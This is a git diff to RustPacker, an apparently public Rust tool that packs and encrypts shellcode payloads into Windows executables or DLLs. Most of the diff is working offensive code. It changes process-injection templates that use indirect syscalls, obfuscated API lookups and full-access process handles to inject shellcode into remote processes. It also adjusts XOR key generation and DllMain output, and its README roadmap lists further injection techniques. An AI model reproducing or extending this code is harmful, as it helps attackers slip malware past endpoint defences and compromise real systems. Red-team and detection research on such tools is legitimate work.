diff --git a/README.md b/README.md index e9e6313..ddc6f09 100644 --- a/README.md +++ b/README.md @@ -140,15 +140,6 @@ podman run --rm -v %cd%/shared:/usr/src/RustPacker/shared:z rustpacker RustPacke -f shared/payload.raw -i ntcrt -e aes -b exe -t notepad.exe ``` -### Troubleshooting (Windows) - -| Issue | Solution | -|-------|----------| -| `podman: command not found` | Ensure Podman Desktop is running and `podman` is in your PATH | -| `docker: command not found` | Ensure Docker Desktop is running | -| Container build fails | Check that your container runtime's VM/WSL is started | -| Permission errors on volume mounts | Run your terminal as Administrator, or check Docker Desktop file sharing settings | - ## 📖 Command Line Options ``` @@ -222,7 +213,7 @@ rustpacker -f shared/payload.raw -i ntcrt -e aes -b exe -o shared/my_binary.exe ### Process Injection Templates -These templates inject shellcode into a remote process. Use `-t ` to specify the target (default: `dllhost.exe`). The target process name is **case sensitive**. +These templates inject shellcode into a remote process. Use `-t ` to specify the target (default: `dllhost.exe`). | Template | API Level | Indirect Syscalls | Dynamic API | Description | |----------|-----------|:-----------------:|:-----------:|-------------| @@ -320,8 +311,9 @@ Contributions are welcome! Here's how you can help: - [x] Indirect syscalls for fiber templates - [x] Cross-platform support (Linux, Windows, macOS) - [ ] String encryption (litcrypt) -- [ ] Binary signing support -- [ ] Mutex/Semaphore support +- [ ] Check DLL support for all templates +- [ ] Add EarlyCascade injection template +- [ ] Add DLL proxying support ## 🙏 Acknowledgments diff --git a/src/puzzle.rs b/src/puzzle.rs index 0199fc8..feeee9f 100644 --- a/src/puzzle.rs +++ b/src/puzzle.rs @@ -92,7 +92,7 @@ fn build_encrypted_output(order: &Order, src_dir: &Path) -> (EncryptionOutput, S let include_path = format!("\"{}\"", filename); let output = match order.encryption { - Encryption::Xor => encrypt_xor(&order.shellcode_path, &path, random_u8()), + Encryption::Xor => encrypt_xor(&order.shellcode_path, &path, non_zero_random_key()), Encryption::Aes => { encrypt_aes(&order.shellcode_path, &path, &random_aes_key(), &random_aes_iv()) } @@ -147,10 +147,13 @@ fn apply_dll_format( replacements.insert("{{DLL_FORMAT}}", dll_cargo_conf.to_string()); let dll_main_fn = r#" + const DLL_PROCESS_ATTACH: u32 = 1; + const DLL_PROCESS_DETACH: u32 = 0; + #[no_mangle] #[allow(non_snake_case, unused_variables, unreachable_patterns)] extern "system" fn DllMain( - dll_module: u32, + dll_module: usize, call_reason: u32, _: *mut ()) -> bool diff --git a/src/tools.rs b/src/tools.rs index e8ae48a..363a4d8 100644 --- a/src/tools.rs +++ b/src/tools.rs @@ -152,10 +152,14 @@ mod tests { #[test] fn test_absolute_path_already_absolute() { - let path = Path::new("/tmp/test"); + let path = if cfg!(windows) { + Path::new("C:\\tmp\\test") + } else { + Path::new("/tmp/test") + }; let result = absolute_path(path).unwrap(); assert!(result.is_absolute()); - assert_eq!(result, Path::new("/tmp/test")); + assert_eq!(result, path); } #[test] diff --git a/templates/ntCRT/Cargo.toml b/templates/ntCRT/Cargo.toml index e32e2ce..b4218f2 100644 --- a/templates/ntCRT/Cargo.toml +++ b/templates/ntCRT/Cargo.toml @@ -9,7 +9,7 @@ edition = "2021" [dependencies] sysinfo = "0.38" -winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "lmaccess", "libloaderapi"] } +winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "libloaderapi", "winnt"] } {{DEPENDENCIES}} [profile.release] diff --git a/templates/ntCRT/src/main.rs b/templates/ntCRT/src/main.rs index c69b222..af2d509 100644 --- a/templates/ntCRT/src/main.rs +++ b/templates/ntCRT/src/main.rs @@ -2,14 +2,13 @@ #![allow(non_snake_case)] use sysinfo::System; -use std::ffi::{CString, OsStr}; +use std::ffi::CString; use std::include_bytes; use std::ptr::null_mut; use winapi::{ um::{ - winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE, PAGE_EXECUTE_READ, THREAD_ALL_ACCESS}, - lmaccess::ACCESS_ALL, + winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE, PAGE_EXECUTE_READ, THREAD_ALL_ACCESS, PROCESS_ALL_ACCESS}, libloaderapi::{GetModuleHandleA, GetProcAddress}, }, shared::{ @@ -63,8 +62,11 @@ type FH = unsafe extern "system" fn(u32, *const i64) -> i32; fn boxboxbox(tar: &str) -> Vec { let mut dom: Vec = Vec::new(); let s = System::new_all(); - for pro in s.processes_by_exact_name(OsStr::new(tar)) { - dom.push(usize::try_from(pro.pid().as_u32()).unwrap()); + let tar_lower = tar.to_lowercase(); + for (_, pro) in s.processes() { + if pro.name().to_string_lossy().to_lowercase() == tar_lower { + dom.push(usize::try_from(pro.pid().as_u32()).unwrap()); + } } dom } @@ -105,7 +107,7 @@ fn enhance(mut buf: Vec, tar: usize) { let f_protect: FD = std::mem::transmute(g(OBF_D)); let f_thread: FE = std::mem::transmute(g(OBF_E)); - let s = f_open(&mut process_handle, ACCESS_ALL, &mut oa, &mut ci); + let s = f_open(&mut process_handle, PROCESS_ALL_ACCESS, &mut oa, &mut ci); if !NT_SUCCESS(s) { return; } pause(150); diff --git a/templates/sysCRT/Cargo.toml b/templates/sysCRT/Cargo.toml index c8c241b..b303582 100644 --- a/templates/sysCRT/Cargo.toml +++ b/templates/sysCRT/Cargo.toml @@ -11,7 +11,7 @@ edition = "2021" rust_syscalls = { git = "https://github.com/Nariod/rust_syscalls", features = ["_INDIRECT_"] } sysinfo = "0.38" ntapi = { version = "0.4", features = ["impl-default"] } -winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "lmaccess"] } +winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "winnt"] } {{DEPENDENCIES}} [profile.release] diff --git a/templates/sysCRT/src/main.rs b/templates/sysCRT/src/main.rs index 3e2926b..1a7de5d 100644 --- a/templates/sysCRT/src/main.rs +++ b/templates/sysCRT/src/main.rs @@ -2,14 +2,12 @@ #![allow(non_snake_case)] use sysinfo::System; -use std::ffi::OsStr; use std::include_bytes; use rust_syscalls::syscall; use winapi::{ um::{ - winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE}, - lmaccess::{ACCESS_ALL} + winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE, PROCESS_ALL_ACCESS} }, shared::{ ntdef::{OBJECT_ATTRIBUTES, HANDLE, NT_SUCCESS} @@ -34,8 +32,11 @@ use std::time::Instant; fn boxboxbox(tar: &str) -> Vec { let mut dom: Vec = Vec::new(); let s = System::new_all(); - for pro in s.processes_by_exact_name(OsStr::new(tar)) { - dom.push(usize::try_from(pro.pid().as_u32()).unwrap()); + let tar_lower = tar.to_lowercase(); + for (_, pro) in s.processes() { + if pro.name().to_string_lossy().to_lowercase() == tar_lower { + dom.push(usize::try_from(pro.pid().as_u32()).unwrap()); + } } dom } @@ -69,7 +70,7 @@ fn enhance(mut buf: Vec, tar: usize) { }; unsafe { - let s = syscall!("NtOpenProcess", &mut process_handle, ACCESS_ALL, &mut oa, &mut ci); + let s = syscall!("NtOpenProcess", &mut process_handle, PROCESS_ALL_ACCESS, &mut oa, &mut ci); if !NT_SUCCESS(s) { return; } pause(150); diff --git a/templates/winCRT/src/main.rs b/templates/winCRT/src/main.rs index ff09c70..b77765e 100644 --- a/templates/winCRT/src/main.rs +++ b/templates/winCRT/src/main.rs @@ -2,7 +2,6 @@ #![allow(non_snake_case)] use sysinfo::System; -use std::ffi::OsStr; use windows::Win32::System::Diagnostics::Debug::WriteProcessMemory; use windows::Win32::System::Memory::VirtualAllocEx; use windows::Win32::System::Memory::VirtualProtectEx; @@ -23,8 +22,11 @@ use std::thread; fn boxboxbox(tar: &str) -> Vec { let mut dom: Vec = Vec::new(); let s = System::new_all(); - for pro in s.processes_by_exact_name(OsStr::new(tar)) { - dom.push(usize::try_from(pro.pid().as_u32()).unwrap()); + let tar_lower = tar.to_lowercase(); + for (_, pro) in s.processes() { + if pro.name().to_string_lossy().to_lowercase() == tar_lower { + dom.push(usize::try_from(pro.pid().as_u32()).unwrap()); + } } dom }